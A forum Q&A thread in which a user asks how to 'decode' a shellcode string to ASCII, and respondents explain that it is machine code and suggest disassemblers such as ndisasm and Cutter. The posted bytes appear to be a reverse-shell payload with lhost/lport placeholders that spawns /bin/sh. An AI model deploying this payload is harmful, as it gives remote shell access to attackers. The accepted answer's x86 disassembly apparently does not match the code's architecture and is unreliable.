# how to decode shellcode to ascii

Tags: linux, decoding, shellcode

i have some shellcode that when i convert to ascii it doesnt output text its just gibberish.

```
\x24\x11\xff\xff\x24\x04\x27\x0f\x24\x02\x10\x46\x01\x01\x01\x0c\x1e\x20\xff\xfc\x24\x11\x10\x2d\x24\x02\x0f\xa2\x01\x01\x01\x0c\x1c\x40\xff\xf8\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0\x3c\x0e + lport +\x35\xce + lport +\xaf\xae\xff\xe4\x3c\x0e + lhost[:2] +\x35\xce + lhost[2:4] +\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x0f\xff\xfd\x01\xe0\x78\x27\x8f\xa4\xff\xff\x01\xe0\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x21\xef\xff\xff\x15\xf0\xff\xfa\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c
```

i tried decoding it multiple ways with the same output, is there any other way to decode this?

Comment: elaborate what you mean with `shellcode`; there is plenty of non-ASCII data in the example (anything above \x7f);  for lower values there is  `echo -e '\x43\x61\x74'`

Comment: Whenever you have some byte values corresponding to a string it is absolutely necessary to know which *encoding* those byte values are in. Without the encoding all you can do is try converting the string from a bunch of them to the target encoding. Even then you need to keep in mind that not all encodings are equal - ASCII only has so many *code points,* other encodings have other code points and other ways of constructing characters from bytes, such as multi-byte encodings like UTF-8.

Comment: Shellcode contains machine instructions, so decoding as ASCII will definitely not work. You should probably try a disassembler. I don't know tools capable of doing that, but maybe objdump could help you

Answer (score 8, accepted):

You can disassemble using python one liner with `ndisasm` tools.

eg. `python -c 'print "\x24\x11\xff\xff\x24\x04\x27\x0f"' | ndisasm -u -`

Result :

```
00000000  2411              and al,0x11
00000002  FF                db 0xff
00000003  FF2404            jmp [esp+eax]
00000006  27                daa
00000007  0F                db 0x0f
00000008  0A                db 0x0a
```

Answer (score 0):

You could use cutter which is a debug / dumping tool for all kinds of files.
You can make a files e.g:
`touch script.sh` type your shellcode in the file and then run e.g: `cutter script.sh` if you don't know how to use the individual tools in the CLI, and get more information in one place, then only the dissasembly with:

```
python -c 'print "\x24\x11\xff\xff\x24\x04\x27\x0f"' | ndisasm -u -
```

then cutter is a great tool for showing you information quick and easy.

Cutter:
https://cutter.re/